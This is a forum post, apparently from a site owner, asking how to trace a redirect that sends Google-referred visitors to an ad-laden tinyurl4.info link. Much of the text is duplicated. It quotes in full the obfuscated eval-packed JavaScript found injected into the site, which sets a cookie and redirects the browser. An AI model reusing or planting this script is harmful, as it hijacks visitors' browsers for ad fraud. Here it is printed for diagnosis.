Tweet
Hi Guys, in the last week I noticed my traffic drop by about 80% and on doing a little trouble shooting I've found that any traffic referred to me via google is being redirected to another site (via a tinyurl4.info short link)
The other site is basically just full of ads and pop unders so they are obviously after the revenue.
I checked on over AT http://redleg-redleg.com/file-viewer/ and the page results highlighted the following code:
This has to be the culprit as the 'd5595656' is the same as the url that the site is being diverted to.
Now onto the tricky part.
I have scanned all my files and database for any reference to 'd5595656' and I've been unable to locate it anywhere.
Does anyone have any ideas how I can find out how or where this additional code is being injected from? If I goto my homepage and view source the code is not visible, it only appears to be injected when the referal is from google.
Any assistance would be very much appreciated.
Cheers
Mark
The other site is basically just full of ads and pop unders so they are obviously after the revenue.
I checked on over AT http://redleg-redleg.com/file-viewer/ and the page results highlighted the following code:
Code:
< html> < head> < /head> < body> < script type≈ "text/javascript"> var ipbs≈ 'd5595656';eval(function (p, a, c, k, e, d){e≈ function (c){return(c< a?'':e(parseInt(c/a)))+((c≈ c%a)> 35?String·fromCharCode (c+29):c.toString(36))};if(!''.replace(/^/, String)){while(c--){d[e(c)]≈ k[c]||e(c)}k≈ [function (e){return d[e]}];e≈ function (){return'\\w+'};c≈ 1};while(c--){if(k[c]){p≈ p.replace(new RegExp('\\b'+e(c)+'\\b', 'g'), k[c])}}return p}('m a≈ ["\\A\\d\\b\\l\\c\\z\\d", "\\j\\d\\b\\l\\c\\z\\d", "\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k", "\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A", "\\o\\e\\e\\G\\c\\d", "\\k", "\\w\\q\\g\\v\\b\\u\\k\\f", "\\c\\g\\H\\j", "\\E", "\\r\\e\\o\\v\\b\\c\\e\\i", "\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p, y){m h≈ N O();h[a[1]](h[a[0]]()+L);m s≈ a[2]+h[a[3]]();t[a[4]]≈ p+a[5]+y+s+a[6]};x(a[7], a[8]);t[a[9]]≈ a[F]+Q;', 56, 56, '||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function |new|Date|x66|ipbs|x75|x34|x2E'.split('|'), 0, {}))< / script > < /body> < /html>
Now onto the tricky part.
I have scanned all my files and database for any reference to 'd5595656' and I've been unable to locate it anywhere.
Does anyone have any ideas how I can find out how or where this additional code is being injected from? If I goto my homepage and view source the code is not visible, it only appears to be injected when the referal is from google.
Any assistance would be very much appreciated.
Cheers
Mark
Comment